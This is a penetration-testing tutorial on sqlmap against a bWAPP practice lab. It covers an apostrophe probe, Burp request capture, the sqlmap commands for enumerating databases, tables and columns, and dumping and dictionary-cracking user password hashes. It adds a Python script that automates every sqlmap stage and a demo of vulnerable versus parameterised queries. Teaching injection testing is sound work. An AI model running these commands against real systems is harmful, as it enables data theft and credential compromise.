SQLmap SQL Injection Tool: The Basics
This course covers the basics of using sqlmap. sqlmap is an open-source penetration-testing tool that automates the detection and exploitation of SQL injection flaws. A SQL injection attack lets an attacker run their own SQL against the database behind a website or web application, whatever the database engine (MySQL, SQL Server, Oracle and many others). Those databases often hold sensitive data such as customer records, personal data, trade secrets and financial information, so being able to find SQL injection vulnerabilities, and to defend against them, is vital. sqlmap helps with the finding part.
In this video guide we cover the basics of using sqlmap to carry out a SQL injection attack; a successful injection can be devastating. We use Burp Suite throughout the walkthrough, so make sure you are familiar with it before you try this; you might want to go through our Burp Suite guide first.
In this demonstration we go through a SQL injection with sqlmap in 4 steps:
Step 1 – Set up a SQL injection with Burp Suite. In this video we use a test environment (bWAPP) at the IP address 10.1.1.102. Open Burp Suite and, under the Proxy tab, set Intercept to off. Then, in the browser that has Burp configured as its proxy, log in with the credentials we already acquired, bee and bug. In the drop-down menu that follows, choose the SQL Injection (Login Form/User) exercise. We are now presented with an ordinary login form.
To confirm the form is injectable we first enter SQL syntax in the username field. The apostrophe is the string delimiter in SQL, so an unbalanced apostrophe (one, or any odd number of them) closes the string early and leaves the rest of the query syntactically broken; if the application echoes the database error back to us, that is the signal for an error-based SQL injection. Select Login. We should get an error back reporting a problem in the SQL syntax, which tells us there is potential for SQL injection here.
Now capture a clean request for sqlmap: type test and test in the username and password fields, go back to Burp Suite, open the Proxy tab, switch Intercept on, and then select Login in the web app. Burp intercepts the login request and shows it in the Raw tab. We use this captured request with sqlmap.
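The apostrophe test in Step 1 works because the vulnerable application pastes the username straight into the query text. The following added example (not code from the course or from bWAPP) reproduces that behaviour in Python against an in-memory SQLite table, so you can see which probes break the query and why, and compares it with a parameterised query that treats the same input as data. The table, its rows and the query shapes are constructed stand-ins, not bWAPP's real schema; the point it adds beyond the text is that two apostrophes do not trigger the error, because `''` is an escaped quote inside a SQL string, whereas one or three do.

```python
import sqlite3


def make_db():
    """Constructed users table standing in for the target's; not bWAPP's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT, email TEXT)"
    )
    conn.execute(
        "INSERT INTO users (login, password, email) VALUES ('bee', 'bug', 'bee@example.com')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: whatever the user types becomes part of the SQL.

    Returns 'ok', 'denied', or 'error: <db message>'. An error-based injection
    relies on that last case leaking back to the browser.
    """
    query = (
        "SELECT id FROM users WHERE login = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as exc:  # unbalanced quote breaks the syntax
        return "error: " + str(exc)
    return "ok" if row else "denied"


def login_hardened(conn, username, password):
    """Parameterised query: the driver passes the input as a value, never as SQL."""
    query = "SELECT id FROM users WHERE login = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return "ok" if row else "denied"


# The probes from the walkthrough: valid credentials, then 1, 2 and 3 apostrophes.
PROBES = {
    "valid": ("bee", "bug"),
    "one_quote": ("'", "test"),
    "two_quotes": ("''", "test"),
    "three_quotes": ("'''", "test"),
}


def run_probes(login_fn):
    """Map each probe name to the result the given login function produces."""
    conn = make_db()
    return {name: login_fn(conn, user, pw) for name, (user, pw) in PROBES.items()}


if __name__ == "__main__":
    for label, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        print(label)
        for name, result in run_probes(fn).items():
            print(f"  {name:13s} -> {result}")
```

Against the vulnerable function an odd number of apostrophes produces a database error and an even number is silently accepted as a literal quote character, which is why "a few apostrophes" sometimes looks clean and sometimes errors. The hardened function returns "denied" for every probe, so there is no syntax error for sqlmap to key on.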
Step 2 – Using sqlmap for the injection. We now hand the intercepted request to sqlmap by saving it to a file. Highlight the request in the Raw tab, right-click, and select Copy to file. Save it in the home folder with the file name SQLI (for SQL injection). Saving the request avoids copying long strings of headers and parameters by hand, because sqlmap can read the whole HTTP request from a file.
Next, open a terminal. Launch sqlmap with the -r option, which tells it to take the target request from a file, followed by the file name SQLI. To have sqlmap enumerate the databases reachable through the injectable login form, add --dbs, so the command is sqlmap -r SQLI --dbs. sqlmap now tests the request's parameters for injection; after a moment it confirms the injection and lists the databases it found.
Step 3 – Narrowing the injection. Along with the database names, sqlmap has fingerprinted the back-end database management system (DBMS) and reports that it is MySQL. We use that to drill further in. Press the Up arrow to recall the previous command and extend it. Since we already know the DBMS, we tell sqlmap so with --dbms=MySQL, which saves it re-fingerprinting on every run. The web application is called bwapp, so we point sqlmap at that database with -D bwapp (capital D) and ask for its tables with --tables; --dbs is no longer needed once a database is named. Press Enter to send sqlmap off again. After a short time it reports 5 tables in the bwapp database: blog, heroes, movies, users and visitors.
We can now look inside a table. The users table is the most likely to hold compromising data, so recall the previous command, select the table with -T users, and replace --tables with --columns to list that table's fields. sqlmap returns the column names and their types rather than the data itself: among them are the id, login, email and password columns, with password stored as varchar (variable-length characters). That tells us where the credentials live; when the values are dumped they turn out to be hashed (scrambled with a one-way function) rather than plaintext.
Step 4 – Cracking the hashed data. If the passwords are hashed, sqlmap can attempt to crack them. Recall the previous command, remove --columns, and add --dump, which tells sqlmap to retrieve the contents of the users table. When sqlmap recognises hashes in the output it first asks whether to store them in a temporary file for processing with other tools; answer N for no. It then asks whether to crack them with a dictionary attack, that is, by hashing each word in a wordlist and comparing it with the stored hashes; answer yes. After a moment sqlmap shows the cracked passwords in readable form next to each hash. Note that a dictionary attack only recovers passwords that appear in the wordlist; anything else stays as a hash.
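The four sqlmap invocations above, collected into one script, as an added example that is not part of the course material. It embeds a constructed sample of the request file that Burp's Copy to file produces (the path, cookie and field names are assumptions standing in for the real capture of 10.1.1.102), parses it to show exactly what -r hands to sqlmap, and builds the argument list for each stage with the flags the walkthrough uses, adding --batch so the run is non-interactive (sqlmap then takes the default answer to each prompt; for the two hash prompts in Step 4 those defaults are the answers the walkthrough gives: no temporary file, yes to the dictionary attack). sqlmap is only invoked when the script is run as a program, and only if it is installed.

```python
import shutil
import subprocess
from pathlib import Path

# Constructed sample of a saved Burp request. Path, cookie values and the two
# form field names are assumptions; the real file is whatever Burp captured.
SAMPLE_REQUEST = (
    "POST /bWAPP/login_form.php HTTP/1.1\r\n"
    "Host: 10.1.1.102\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=constructed; security_level=0\r\n"
    "Content-Length: 24\r\n"
    "\r\n"
    "login=test&password=test"
)

# Flags per stage, mirroring Step 2 to Step 4. 'dbms', 'db' and 'table' are
# what the walkthrough discovered; change them to match your own run.
STAGES = {
    "dbs": ["--dbs"],
    "tables": ["--dbms=MySQL", "-D", "bwapp", "--tables"],
    "columns": ["--dbms=MySQL", "-D", "bwapp", "-T", "users", "--columns"],
    "dump": ["--dbms=MySQL", "-D", "bwapp", "-T", "users", "--dump"],
}


def parse_request(text):
    """Split a raw HTTP request into method, path, headers and body parameters.

    This is the information sqlmap extracts from a -r file: the injectable
    parameters are the ones in the body (and any in the query string).
    """
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = {}
    for pair in body.split("&") if body else []:
        key, _, value = pair.partition("=")
        params[key] = value
    return {"method": method, "path": path, "headers": headers, "params": params}


def write_request(path):
    """Write the sample request to disk, as Burp's Copy to file would."""
    Path(path).write_text(SAMPLE_REQUEST)
    return Path(path)


def sqlmap_argv(request_file, stage):
    """Build the sqlmap command line for one stage of the walkthrough."""
    if stage not in STAGES:
        raise ValueError(f"unknown stage {stage!r}; expected one of {list(STAGES)}")
    return ["sqlmap", "-r", str(request_file), "--batch"] + STAGES[stage]


def run_stage(request_file, stage):
    """Invoke sqlmap for a stage; returns the CompletedProcess (requires sqlmap)."""
    return subprocess.run(sqlmap_argv(request_file, stage), check=False)


if __name__ == "__main__":
    req = write_request("SQLI")
    parsed = parse_request(SAMPLE_REQUEST)
    print("injecting into", parsed["method"], parsed["path"], "params:", list(parsed["params"]))
    for stage in STAGES:
        print(" ".join(sqlmap_argv(req, stage)))
        if shutil.which("sqlmap"):
            run_stage(req, stage)
```

Run it in the directory holding the Burp export (or let it write the sample file) and it prints the exact command line for each stage before running it; without sqlmap on the PATH it only prints them, which is still a handy checklist of the -r, --dbs, --dbms, -D, --tables, -T, --columns and --dump flags in the order the walkthrough uses them.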
In 4 steps we have gone from an error message on a login form to the cracked passwords of this web application's users.